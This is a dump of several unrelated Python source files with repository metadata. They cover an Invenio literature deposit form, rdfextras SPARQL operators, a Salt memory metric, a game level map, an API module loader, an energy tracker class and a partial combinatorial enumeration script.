("fin", _("Finnish")),
("rus", _("Russian"))]
language = fields.LanguageField(
label=_("Language"),
choices=languages
)
conf_name = fields.TextField(
label=_('Conference name'),
widget_classes="form-control"
)
# ==============
# Thesis related
# ==============
supervisors = fields.DynamicFieldList(
fields.FormField(
AuthorInlineForm,
widget=ExtendedListWidget(
item_widget=ItemWidget(),
html_tag='div',
),
),
label=_('Supervisors'),
add_label=_('Add another supervisor'),
icon='fa fa-user fa-fw',
min_entries=1,
export_key='supervisors',
widget_classes=thesis_class,
)
defense_date = fields.Date(
label=_('Date of Defense'),
description='Format: YYYY-MM-DD.',
widget=defensedate_widget,
)
degree_type = fields.TextField(
label=_('Degree type'),
widget_classes="form-control" + thesis_class,
)
university = fields.TextField(
label=_('University'),
widget_classes="form-control" + thesis_class,
)
# ============
# Journal Info
# ============
journal_title = fields.TextField(
label=_('Journal Title'),
widget_classes="form-control"
)
page_range = fields.TextField(
label=_('Page range'),
placeholder=_('1-100'),
widget_classes="form-control"
)
article_id = fields.TextField(
label=_('Article ID'),
widget_classes="form-control"
)
volume = fields.TextField(
label=_('Volume'),
widget_classes="form-control"
)
year = fields.TextField(
label=_('Year'),
widget_classes="form-control"
)
issue = fields.TextField(
label=_('Issue'),
widget_classes="form-control"
)
# ====================
# Fulltext Information
# ====================
file_field = fields.FileUploadField(
label="",
widget=plupload_widget,
export_key=False
)
url = fields.TextField(
label=_('External URL'),
#validators=[validators.URL(), validators.Optional, ],
placeholder=_("http://www.example.com"),
widget_classes="form-control",
export_key='url',
)
# ok_to_upload = fields.BooleanField(
# label=_('I ensure the file is free to be uploaded.'),
# default=False,
# validators=[required_if('file_field',
# [lambda x: bool(x.strip()), ], # non-empty
# message="It's required to check this box."
# ),
# required_if('url',
# [lambda x: bool(x.strip()), ], # non-empty
# message="It's required to check this box."
# ),
# ]
# )
#
# Form Configuration
#
_title = _("Literature suggestion")
# _subtitle = 'Instructions: (i) Press "Save" to save your upload for '\
# 'editing later, as many times you like. (ii) Upload or remove'\
# ' extra files in the bottom of the form. (iii) When ready, '\
# 'press "Submit" to finalize your upload. <br><br> If you '\
# 'already have an <strong>ArXiv</strong> id or a '\
# '<strong>DOI</strong>, fill the proper fields and the form '\
# 'should be automatically completed.'\
# Group fields in categories
groups = [
('Import from existing source',
['doi', 'arxiv_id', 'isbn', 'import_source'],
{
'indication': 'Fill if you have a DOI, ArXiv id or ISBN',
}),
('Document Type',
['captcha', 'type_of_doc', ]),
('Basic Information',
['title', 'authors', 'collaboration', 'experiment', 'abstract',
'page_nr', 'language', 'subject', 'supervisors', 'defense_date',
'degree_type', 'university']),
('Conference Information',
['conf_name']),
('Journal Information',
['journal_title', 'volume', 'issue', 'page_range', 'article_id',
'year']),
('Proceedings information (not published in journal)',
[]),
('Fulltext Information',
['file_field', 'url']),
]
field_sizes = {
'file_field': 'col-md-12',
'type_of_doc': 'col-xs-4',
}
#
# Workflow
#
class literature(SimpleRecordDeposition):
"""Literature deposit submission."""
workflow = [
# Pre-fill draft with values passed in from request
prefill_draft(draft_id='default'),
# Render form and wait for user to submit
render_form(draft_id='default'),
# Create the submission information package by merging form data
# from all drafts (in this case only one draft exists).
prepare_sip(),
# Fills sip with existing ArXiv source
#harvest_arxiv(),
# Process metadata to match your JSONAlchemy record model. This will
# call process_sip_metadata() on your subclass.
process_sip_metadata(),
# Reserve a new record id, so that we can provide proper feedback to
# user before the record has been uploaded.
create_recid(),
# Generate MARC based on metadata dictionary.
finalize_record_sip(is_dump=False),
# Hold the deposition for admin approval
hold_for_approval(),
# Seal the SIP and write MARCXML file and call bibupload on it
upload_record_sip(),
]
hold_for_upload = False
name = "Literature"
name_plural = "Literature depositions"
group = "Articles & Preprints"
draft_definitions = {
'default': LiteratureForm,
}
@classmethod
def process_sip_metadata(cls, deposition, metadata):
"""Map fields to match jsonalchemy configuration."""
# ========
# Abstract
# ========
if 'abstract' in metadata:
abstract = metadata['abstract']
metadata['abstract'] = {}
metadata['abstract']['abstract'] = fromstring(abstract).text_content()
# =======
# Title
# =======
title = metadata['title']
metadata['title'] = {}
metadata['title']['main'] = title
# =======
# Authors
# =======
if 'authors' in metadata and metadata['authors']:
metadata['_first_author'] = metadata['authors'][0]
metadata['_first_author']['email'] = ''
if metadata['authors'][1:]:
metadata['_additional_authors'] = metadata['authors'][1:]
for k in metadata['_additional_authors']:
k['email'] = ''
del metadata['authors']
# ===========
# Supervisors
# ===========
if 'supervisors' in metadata and metadata['supervisors']:
metadata['thesis_supervisor'] = metadata['supervisors'][0]
metadata['thesis_supervisor']['email'] = ''
#metadata['_additional_authors'] = metadata['authors'][1:]
# ==============
# Thesis related
# ==============
if metadata['type_of_doc'] == 'thesis':
metadata['thesis'] = {}
metadata['thesis']['date'] = metadata['defense_date']
metadata['thesis']['university'] = metadata['university']
metadata['thesis']['type'] = metadata['degree_type']
# ========
# Category
# ========
metadata['collections'] = {}
metadata['collections']['primary'] = ['HEP']
# ==========
# Experiment
# ==========
if 'experiment' in metadata:
metadata['accelerator_experiment'] = {}
metadata['accelerator_experiment']['experiment'] = metadata['experiment']
# ===============
# Conference Info
# ===============
if 'conf_number' in metadata:
metadata['nonpublic_note'] = metadata['conf_name']
metadata['collections']['primary'] += ['ConferencePaper']
# ================
# Publication Info
# ================
metadata['publication_info'] = {}
if 'journal_title' in metadata:
metadata['publication_info']['title'] = metadata['journal_title']
# this should only allow the user to fill whether the page_range or the article_id
if 'page_range' in metadata:
metadata['publication_info']['page_artid'] = metadata['page_range']
elif 'article_id' in metadata:
metadata['publication_info']['page_artid'] = metadata['article_id']
if 'volume' in metadata:
metadata['publication_info']['journal_volume'] = metadata['volume']
if 'year' in metadata:
metadata['publication_info']['year'] = metadata['year']
if 'issue' in metadata:
metadata['publication_info']['journal_issue'] = metadata['issue']
# Delete useless data
delete_keys = ['supervisors',
'defense_date',
'degree_type',
'university',
'journal_title',
'page_range',
'article_id',
'volume',
'year',
'issue',
'conf_name',
'experiment']
for key in delete_keys:
if key in metadata:
del metadata[key]
|
UTF-8
|
Python
| false | false | 2,014 |
5,016,521,819,404 |
5fdf48b7293e1fa3919dfd941391bc5937b005b0
|
bce8c8b0835f1b6fdf33a1aff76cb7e790ae8486
|
/rdfextras/sparql/operators.py
|
417726a8748dcb82ac5d1c3cda680fb3c1d81fa6
|
[
"BSD-3-Clause"
] |
permissive
|
RDFLib/rdfextras
|
https://github.com/RDFLib/rdfextras
|
9e1ab6369ea8b04421cc13843bbb1a5ce0300176
|
c66b30de4a3b9cb67090add06cb8a9cf05d2c545
|
refs/heads/master
| 2023-08-16T04:57:26.503211 | 2013-05-19T14:10:27 | 2013-05-19T14:10:27 | 3,342,174 | 6 | 5 | null | false | 2015-11-05T15:09:16 | 2012-02-03T06:16:14 | 2015-05-15T02:18:21 | 2015-11-05T07:34:15 | 2,557 | 20 | 12 | 1 |
Python
| null | null |
# -*- coding: utf-8 -*-
"""
$Date: 2005/11/04 14:06:36 $, by $Author: ivan $, $Revision: 1.1 $
API for the SPARQL operators.
-----------------------------
The operators (eg, 'lt') return a *function* that can be added to the AND
clause of a query. The parameters are either regular values or query strings.
The resulting function has one parameter (the binding directory), it can be
combined with others or be plugged to into an array of constraints.
For example::
constraints = [lt("?m", 42)]
for checking whether "?m" is smaller than the (integer) value 42. It can be
combined using the lambda function, for example::
constraints = [lambda(b): lt("?m", 42")(b) or lt("?n", 134)(b)]
is the expression for::
AND ?m < 42 || ?n < 134
(Clearly, the relative complexity is only on the API level; a SPARQL
language parser that starts with a SPARQL expression can map on this API).
"""
import sys, re
from rdflib.term import Literal, BNode, URIRef, Variable
from rdflib.namespace import XSD
from rdfextras.sparql.graph import _createResource
from rdfextras.sparql import _questChar, Debug
# We replace str with a custom function below. This messes things up after
# 2to3 conversion, which replaces basestring with str. At some point, we should
# clean this up properly - i.e. don't override the builtin str.
str_ = basestring
def queryString(v):
"""
Boolean test whether this is a a query string or not
:param v: the value to be checked
:returns: True if it is a query string
"""
return isinstance(v,str_) and len(v) != 0 and v[0] == _questChar
def getLiteralValue(v):
"""
Return the value in a literal, making on the fly conversion on datatype
(using the datatypes that are implemented)
:param v: the Literal to be converted
:returns: the result of the conversion.
"""
return v
def getValue(param):
"""
Returns a *value retrieval function*. The return value can be plugged in a
query; it would return the value of param directly if param is a real value,
and the run-time value if param is a query string of the type "?xxx".
If no binding is defined at the time of call, the return value is None.
:param param: query string, Unbound instance, or real value
:returns: a function taking one parameter (the binding directory)
"""
if isinstance(param,Variable):
unBound = True
else:
unBound = queryString(param)
if not unBound:
if isinstance(param, Literal):
value = getLiteralValue(param)
elif callable(param):
return param
else:
value = param
return lambda(bindings): value
def f(bindings):
if unBound:
# @@note, param must be reassigned to avoid tricky issues of scope
# see: http://docs.python.org/ref/naming.html
_param = isinstance(param, Variable) and param or Variable(param[1:])
val = bindings[_param]
if isinstance(val,Literal):
return getLiteralValue(val)
else:
return val
else:
return value
return f
def lt(a, b):
"""
Operator for '<'
:param a: value or query string
:param b: value or query string
:returns: comparison method
"""
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) < fb(bindings)
except:
# raise
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
##
# Operator for '<='
# @param a value or query string
# @param b value or query string
# @return comparison method
def le(a, b):
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) <= fb(bindings)
except:
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
def gt(a, b):
"""
Operator for '>'
:param a: value or query string
:param b: value or query string
:returns: comparison method
"""
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) > fb(bindings)
except:
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
def ge(a, b):
"""
Operator for '>='
:param a: value or query string
:param b: value or query string
:returns: comparison method
"""
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) >= fb(bindings)
except:
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
def eq(a, b):
"""
Operator for '='
:param a: value or query string
:param b: value or query string
:returns: comparison method
"""
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) == fb(bindings)
except:
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
def neq(a, b):
"""
Operator for '!='
:param a: value or query string
:param b: value or query string
:returns: comparison method
"""
fa = getValue(a)
fb = getValue(b)
def f(bindings):
try:
return fa(bindings) != fb(bindings)
except:
# this is the case when the operators are incompatible
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
def __getVariableName(v):
if isinstance(v, Variable):
return v
elif queryString(v):
return v[1:]
else:
return None
def bound(a):
"""
Is the variable bound
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return False
if v in bindings:
val = bindings[v]
return not (val == None)
else:
return False
return f
def isURI(a):
"""
Is the variable bound to a URIRef
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return False
try:
val = bindings[v]
if val == None:
return False
else:
return isinstance(val, URIRef)
except:
return False
return f
def isIRI(a):
"""
Is the variable bound to a IRIRef (this is just an alias for URIRef)
:param a: value or query string
:returns: check method
"""
return isURI(a)
def isBlank(a):
"""
Is the variable bound to a Blank Node
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return False
try:
val = bindings[v]
if val == None:
return False
else:
return isinstance(val, BNode)
except:
return False
return f
def isLiteral(a):
"""
Is the variable bound to a Literal
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return False
try:
val = bindings[v]
if val == None:
return False
else:
return isinstance(val, Literal)
except:
return False
return f
def str(a):
"""
Return the string version of a resource
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return ""
try:
val = bindings[v]
if val == None:
return ""
else:
from __builtin__ import str as _str
return _str(val)
except:
return ""
return f
def lang(a):
"""Return the lang value of a literal
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
return ""
try:
val = bindings[v]
if val == None:
return ""
elif val.language == None:
return ""
else:
return val.language
except:
return ""
return f
def langmatches(lang, _range):
lv = getValue(lang)
rv = getValue(_range)
def f(bindings):
if lv == None:
return False
if rv == None:
return False
return _langMatch(lv(bindings), rv(bindings))
return f
def _langMatch(lang, _range):
"""
Borrowed from http://dev.w3.org/2004/PythonLib-IH/RDFClosure/RestrictedDatatype.py
Author: Ivan Herman
Implementation of the extended filtering algorithm, as defined in
point 3.3.2, of `RFC 4647 <http://www.rfc-editor.org/rfc/rfc4647.txt>`_,
on matching language ranges and language tags.
Needed to handle the C{rdf:PlainLiteral} datatype.
:param range: language range
:param lang: language tag
:returns: boolean
"""
def _match(r, l):
"""Matching of a range and language item: either range is a wildcard
or the two are equal
:param r: language range item
:param l: language tag item
:rtype: boolean
"""
return r == '*' or r == l
rangeList = _range.strip().lower().split('-')
langList = lang.strip().lower().split('-')
if not _match(rangeList[0], langList[0]): return False
rI = 1
rL = 1
while rI < len(rangeList):
if rangeList[rI] == '*':
rI += 1
continue
if rL >= len(langList):
return False
if _match(rangeList[rI], langList[rL]):
rI += 1
rL += 1
continue
if len(langList[rL]) == 1:
return False
else:
rL += 1
continue
return True
def datatype(a):
"""Return the datatype URI of a literal
:param a: value or query string
:returns: check method
"""
v = __getVariableName(a)
def f(bindings):
if v == None:
if isinstance(a, Literal):
return a.datatype
else:
raise TypeError(a)
try :
val = bindings[v]
if val == None:
return TypeError(v)
elif isinstance(val, Literal) and not val.language:
return val.datatype
else:
raise TypeError(val)
except:
raise TypeError(v)
return f
def isOnCollection(collection, item, triplets):
"""
Generate a method that can be used as a global constaint in sparql to
check whether the 'item' is an element of the 'collection' (a.k.a. list).
Both collection and item can be a real resource or a query string.
Furthermore, item might be a plain string, that is then turned into a
literal run-time. The method returns an adapted method.
Is a resource on a collection?
The operator can be used to check whether the 'item' is an element of the
'collection' (a.k.a. list). Both collection and item can be a real resource
or a query string.
:param collection: is either a query string (that has to be bound by the query) or an RDFLib Resource
representing the collection
:param item: is either a query string (that has to be bound by the query), an RDFLib Resource, or
a data type value that is turned into a corresponding Literal (with possible datatype)
that must be tested to be part of the collection
:returns: a function
"""
# check_subject(collection)
collUnbound = False
if isinstance(collection, Variable):
collUnbound = True
collection = collection
elif queryString(collection):
# just keep 'collection', no reason to reassign
collUnbound = True
else:
collUnbound = False
# if we got here, this is a valid collection resource
if isinstance(item, Variable):
queryItem = item
itUnbound = True
elif queryString(item):
queryItem = item
itUnbound = True
else:
# Note that an exception is raised if the 'item' is invalid
queryItem = _createResource(item)
itUnbound = False
def checkCollection(bindings):
try:
if collUnbound == True:
# the binding should come from the binding
coll = bindings[collection]
else:
coll = collection
if itUnbound == True:
it = bindings[queryItem]
else:
it = queryItem
return it in triplets.items(coll)
except:
# this means that the binding is not available. But that also
# means that the global constraint was used, for example, with
# the optional triplets; not available binding means that the
# method is irrelevant for those ie, it should not become a
# show-stopper, hence it returns True
return True
return checkCollection
def addOperator(args, combinationArg):
"""
SPARQL numeric + operator implemented via Python
"""
return ' + '.join([
"sparqlOperators.getValue(%s)%s" % (
i, combinationArg and "(%s)" % combinationArg or '')
for i in args])
def XSDCast(source, target=None):
"""
XSD Casting/Construction Support
For now (this may be an issue since Literal doesn't override comparisons)
it simply creates a Literal with the target datatype using the 'lexical'
value of the source
"""
sFunc = getValue(source)
def f(bindings):
rt = sFunc(bindings)
if isinstance(rt, Literal) and rt.datatype == target:
# Literal already has target datatype
return rt
else:
return Literal(rt, datatype=target)
return f
def regex(item, pattern, flag=None):
"""
Invokes the XPath fn:matches function to match text against a regular
expression pattern.
The regular expression language is defined in XQuery 1.0 and XPath 2.0
Functions and Operators section 7.6.1 Regular Expression Syntax
"""
a = getValue(item)
b = getValue(pattern)
if flag:
cFlag = 0
usedFlags = []
# Maps XPath REGEX flags (http://www.w3.org/TR/xpath-functions/#flags)
# to Python's re flags
for fChar,_flag in [
('i', re.IGNORECASE), ('s', re.DOTALL), ('m', re.MULTILINE)]:
if fChar in flag and fChar not in usedFlags:
cFlag |= _flag
usedFlags.append(fChar)
def f1(bindings):
try:
return bool(re.compile(b(bindings),cFlag).search(a(bindings)))
except:
return False
return f1
else:
def f2(bindings):
try:
return bool(re.compile(b(bindings)).search(a(bindings)))
except:
return False
return f2
def f(bindings):
try:
return bool(re.compile(a(bindings)).search(b(bindings)))
except Exception, e:
print e
return False
return f
def EBV(a):
"""
* If the argument is a typed literal with a datatype of xsd:boolean,
the EBV is the value of that argument.
* If the argument is a plain literal or a typed literal with a
datatype of xsd:string, the EBV is false if the operand value
has zero length; otherwise the EBV is true.
* If the argument is a numeric type or a typed literal with a datatype
derived from a numeric type, the EBV is false if the operand value is
NaN or is numerically equal to zero; otherwise the EBV is true.
* All other arguments, including unbound arguments, produce a type error.
"""
fa = getValue(a)
def f(bindings):
try:
rt = fa(bindings)
if isinstance(rt, Literal):
if rt.datatype == XSD.boolean:
ebv = rt.toPython()
elif rt.datatype == XSD.string or rt.datatype is None:
ebv = len(rt) > 0
else:
pyRT = rt.toPython()
if isinstance(pyRT,Literal):
#Type error, see: http://www.w3.org/TR/rdf-sparql-query/#ebv
raise TypeError("http://www.w3.org/TR/rdf-sparql-query/#ebv")
else:
ebv = pyRT != 0
return ebv
else:
print rt, type(rt)
raise
except Exception, e:
if isinstance(e, KeyError):
# see: http://www.w3.org/TR/rdf-sparql-query/#ebv
raise TypeError("http://www.w3.org/TR/rdf-sparql-query/#ebv")
# this is the case when the operators are incompatible
raise
if Debug:
(typ,val,traceback) = sys.exc_info()
sys.excepthook(typ, val, traceback)
return False
return f
|
UTF-8
|
Python
| false | false | 2,013 |
9,509,057,639,810 |
82ad802f7b7abfb34c60560dc3164319f197a8bb
|
35d1804b49ac3339ba07222764e25656163141b4
|
/Openstack_Havana/file/_modules/metric_memory.py
|
178df9cb6ec96b18286cf89e8d9abb393f95ddff
|
[] |
no_license
|
pyinx/openstack-automation
|
https://github.com/pyinx/openstack-automation
|
e5bb8e38fd5cf999cc036af1b882e67c27b6b352
|
ba26b0ae82a1b1f943a1983e63f3b6a47233fdf2
|
refs/heads/master
| 2017-04-26T20:18:05.616212 | 2013-12-24T09:33:26 | 2013-12-24T09:33:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def utilize():
mem_info = __salt__['status.meminfo']()
if mem_info:
info = dict(
total=float(mem_info['MemTotal']['value']),
free=float(mem_info['MemFree']['value'])
)
return _calculate(info)
def _calculate(info):
active = info['total'] - info['free']
val = (active / info['total']) * 100.0
return val
|
UTF-8
|
Python
| false | false | 2,013 |
19,241,453,520,014 |
fac61be2545d5004fc5d03a974f86bf73e40f460
|
d4387db5d2688f6b4e8c750b2d42497495aed9c9
|
/jouletheif/lvl/lvl_deco.py
|
c3ec75e7191591ebb31aca8eb07763dcbbc32033
|
[] |
no_license
|
602p/JouleThief
|
https://github.com/602p/JouleThief
|
d5e592d327e413e77bf82f381d0d3b9e8cb49cae
|
557dcc10573cfd4389f4873565c57d7a862314bc
|
refs/heads/master
| 2018-05-03T01:59:15.095015 | 2013-06-09T20:30:33 | 2013-06-09T20:30:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
_lvl_map={"#":"Platform(%1%, %2%)", "W":"WinPlatform(%1%, %2%)", "1":"DecorationPlatform(%1%, %2%, 'image/checker_tile.png')"}
_lvl_level=[
"########################################",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# #",
"# 1 #",
"# 1 #",
"# 1 #",
"# #",
"# 1 #",
"# #",
"# 1 #",
"########################################"
]
setx=1*16
sety=27*16
|
UTF-8
|
Python
| false | false | 2,013 |
3,848,290,714,932 |
879353d997890fde3914f4688521077466ff9b86
|
6c94256295aea60d592b893b78bffe3c6adb923a
|
/apio/index/__init__.py
|
9eb7a4e01e4d1485a344a746656375b00de43a0b
|
[
"MIT"
] |
permissive
|
paolo-g/python-apio
|
https://github.com/paolo-g/python-apio
|
805453782f06441899645931f31a7e7eb39734bb
|
12e6ff834efc62c6e9ce0b119ef0a424aea6506a
|
refs/heads/master
| 2020-02-28T00:54:10.006487 | 2012-11-24T01:44:28 | 2012-11-24T01:44:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from __future__ import absolute_import
import sys
import imp
from ..api import API
class DynamicLoader(object):
def find_module(self, name, path=None):
names = name.split('.')
if not name.startswith('apio.index'):
return None
# If we are trying to import apio.index.x
if len(names) >= 3:
return self
return None
def get_package(self, api_name):
package_name = "apio.index.%s" % api_name
# Fetch the base package
if package_name in sys.modules.keys():
package = sys.modules[package_name]
else:
api = API.load(api_name)
package = sys.modules.setdefault(package_name, api)
package.__file__ = "<%s>" % package_name
package.__loader__ = self
package.__path__ = []
return package
def load_module(self, fullname):
names = fullname.split('.')
api_name = names[2]
package = self.get_package(api_name)
# Do we need to go deeper?
specifics = names[3:]
if not specifics:
return package
# Yes we do!
if specifics[0] != 'actions':
print names
raise ImportError()
# We just want actions
if len(specifics) == 1:
package.actions.__file__ = "<%s>" % fullname
package.actions.__loader__ = self
sys.modules.setdefault(fullname, package.actions)
return package.actions
elif len(specifics) == 2:
return getattr(package.actions, specifics[1])
else:
raise ImportError()
sys.meta_path.append(DynamicLoader())
del DynamicLoader
|
UTF-8
|
Python
| false | false | 2,012 |
1,056,561,982,669 |
405589cea7cea10dce4e20b0c67687f34efdea29
|
045858452656cbb95c0021fcedf43d4bfbd7013d
|
/energytrack/energytracker.py
|
b9c818094840e5f07f0dd6abd26661aa4cec2443
|
[
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-or-later",
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-3.0-only"
] |
non_permissive
|
thozza/energy-track
|
https://github.com/thozza/energy-track
|
5cb298c81cb27736ef8fab101795855190ffab34
|
90aca8ad7f9001d8cb8a13368cc1d3eceb63cc87
|
refs/heads/master
| 2020-01-22T10:56:49.857222 | 2014-08-24T12:44:44 | 2014-08-24T12:44:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#
# -*- coding: utf-8 -*-
#
# energytracker.py
# Copyright 2013 Tomas Hozza <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Tomas Hozza <[email protected]>
from energytrack.energy import Energy
class EnergyTracker(object):
def __init__(self, name="New Tracker"):
self._energies = {}
self._name = name
def add_energy(self, energy=None):
if energy is None:
raise TypeError("Required argument 'energy' (pos 1) not found")
elif not isinstance(energy, Energy):
raise TypeError("Required argument 'energy' (pos 1) has to be of type Energy")
elif self.energy_exists(energy.get_name()):
raise ValueError("Energy with the given name already exists")
self._energies[energy.get_name()] = energy
def remove_energy(self, energy_name=None):
if energy_name is None:
raise TypeError("Required argument 'energy_name' (pos 1) not found")
elif not isinstance(energy_name, str):
raise TypeError("Required argument 'energy_name' (pos 1) has to be String")
elif energy_name not in self._energies:
raise ValueError("Energy with the given name doesn't exist")
return self._energies.pop(energy_name)
def get_energy(self, energy_name=None):
if energy_name is None:
raise TypeError("Required argument 'energy_name' (pos 1) not found")
elif not isinstance(energy_name, str):
raise TypeError("Required argument 'energy_name' (pos 1) has to be String")
elif energy_name not in self._energies:
raise ValueError("Energy with the given name doesn't exist")
return self._energies[energy_name]
def energy_exists(self, energy=None):
if energy is None:
raise TypeError("Required argument 'energy' (pos 1) not found")
elif not isinstance(energy, str):
raise TypeError("Required argument 'energy' (pos 1) has to be sting")
elif energy in self._energies:
return True
else:
return False
def check_energy_rename(self, orig_name=None, new_name=None):
if orig_name is None:
raise TypeError("Required argument 'orig_name' (pos 1) not found")
elif not isinstance(orig_name, str):
raise TypeError("Required argument 'orig_name' (pos 1) has to be sting")
if new_name is None:
raise TypeError("Required argument 'new_name' (pos 2) not found")
elif not isinstance(new_name, str):
raise TypeError("Required argument 'new_name' (pos 2) has to be sting")
if orig_name not in self._energies:
raise ValueError("Energy with name '" + orig_name + "' does not exist")
if orig_name == new_name:
return
if new_name in self._energies:
raise ValueError("Energy with name '" + new_name + "' already exists")
def do_energy_rename(self, orig_name=None, new_name=None):
self.check_energy_rename(orig_name, new_name)
energy = self.remove_energy(orig_name)
self.add_energy(energy)
def get_energy_names_list(self):
return list(self._energies)
def load_from_file(self, filename=None):
raise NotImplementedError("Not implemented yet")
def save_to_file(self, filename=None):
raise NotImplementedError("Not implemented yet")
def get_name(self):
return self._name
def set_name(self, name=""):
self._name = name
|
UTF-8
|
Python
| false | false | 2,014 |
8,194,797,635,487 |
8a03496361f6d63eaaff8beaa23ec292ab1af3d2
|
dc897f8c81e85ab8f99cb635578c8750eb374729
|
/chapter5/JumpLoop.py
|
028e052ddb44b5c6da97bb3c13ef18c9748c8225
|
[] |
no_license
|
jianjian198710/PythonStudy
|
https://github.com/jianjian198710/PythonStudy
|
852c6a4dd5122d886b9bcf57756e7113133e74b7
|
f1042a0a4fb1ee10dd2536b268bd00ee26550614
|
refs/heads/master
| 2020-06-04T22:51:47.387955 | 2014-07-23T09:16:15 | 2014-07-23T09:16:15 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#5.5.5
#break
from math import sqrt
for n in range(99,81,-1):
root = sqrt(n)
if root == int(root):
print n
break
else:
print "Don't find it"
#while true
while True:
word = raw_input("Enter a word: ")
if not word: break
print "The word is: "+word
|
UTF-8
|
Python
| false | false | 2,014 |
1,030,792,171,244 |
15dc8a1a9deef86a8ad776f11ea2be89db47c337
|
0af8fb4c81e629ab7d210a9a272190bc2c196365
|
/tree1.py
|
d1bd35583aa82f26d0083ecb947d17b6be8ed4f7
|
[] |
no_license
|
glwhart/enum4
|
https://github.com/glwhart/enum4
|
6fb466bdea5e75fdffd3a0fbc27f8f5223248374
|
c1f1ff5b304c99e3ba45ef4c6d2a2c4bcf202a74
|
refs/heads/master
| 2020-06-09T01:30:29.322925 | 2014-07-08T21:52:21 | 2014-07-08T21:52:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
# This version of the program tries to solve the "surjective enumeration" problem with the order of
# the loops reversed from what we first envisioned. The inner loop will be over colors (traversing
# up and down the "tree") the outer loop will be over configurations for each color.
import sys
def choose(n, k):
"""
A fast way to calculate binomial coefficients by Andrew Dalke (contrib).
(This probably isn't good for large values of n and k, but OK for our purposes --GH)
"""
if 0 <= k <= n:
ntok = 1
ktok = 1
for t in range(1, min(k, n - k) + 1):
ntok *= n
ktok *= t
n -= 1
return ntok // ktok
else:
return 0
def integer2coloring(y, m, a):
"""
Take an integer and convert it into a binary coloring
"""
if m < a or y > choose(m,a): # Check that we didn't give nonsense input
print "y=",y," m=",m," a=",a
sys.exit("bad call to integer2coloring")
# This follows the algorithm in the enum3 paper, Comp Mat Sci 59 101 (2010) exactly
I = y
t = a
ell = m
configlist = [-1]*m
#while any([i==-1 for i in configlist]):
while ell > 0:
if choose(ell-1,t-1) <= I:
configlist[m-ell] = 0
I -= choose(ell-1,t-1)
else:
configlist[m-ell] = 1
t -= 1
ell -= 1
return configlist
def coloring2integer(coloring):
"""
Take a coloring list and convert it into an integer
"""
m = len(coloring)
# Find the rightmost 1 in the list
coloring.reverse()
rm1 = m - coloring.index(1) # Finds the leftmost 1 (but we reversed the list)
coloring.reverse() # Put the list back in the correct order
z = coloring[:rm1].count(0) # Number of zeros with at least one "1" to their right
x = 0
templist = coloring
for i in range(z): # Loop over the zeros with a 1 to their right
p0 = templist.index(0) # Position of first zero in the temporary list
n1r = templist[p0:].count(1) # Number of 1s to the right of leftmost zero
templist = templist[p0+1:] # Throw away the leftmost zero
x += choose(len(templist),n1r-1) # Compute the binomial coefficient for this "digit" of the number
return x
### Test the routines for the case of 10 slots and 3 "red" (and 7 non-red)
colors = [4,2,2] # Number of each color in the list
n = sum(colors) # Number of entries in the list
k = len(colors) # Number of different colors
### Could we make some headway on the restricted site problem (at least for spectators) by using
### groups that skipped those sites (left them unchanged)?
# Construct the cyclic permutation group of order n
group = [range(n)]
for i in range(1,n):
group.append([(j+i)%n for j in group[0]])
survivors = []
### Traverse a tree
# Compute the number of branches at each depth
c = [choose(sum(colors[ilc:]),colors[ilc]) for ilc in range(len(colors)-1)]
if len(c) != k-1: sys.exit("Something is wrong")
loc = [0]*(k-1)
iDepth = -1 # Top of the tree
iBranch = [-1]*(k-1) # Leftmost of the tree
nDepth = k - 1 # Total number of layers in the tree
ic = 0
#nNodes = reduce(lambda x,y:x*y, c)
#nNodes = reduce(lambda x,y:x*y, c[0])
#print nNodes, c
#sys.exit()
#print "# of nodes in tree: ", nNodes
while True:
if iDepth < nDepth -1:
iDepth += 1
iBranch[iDepth] = 0
else:
iBranch[iDepth] += 1
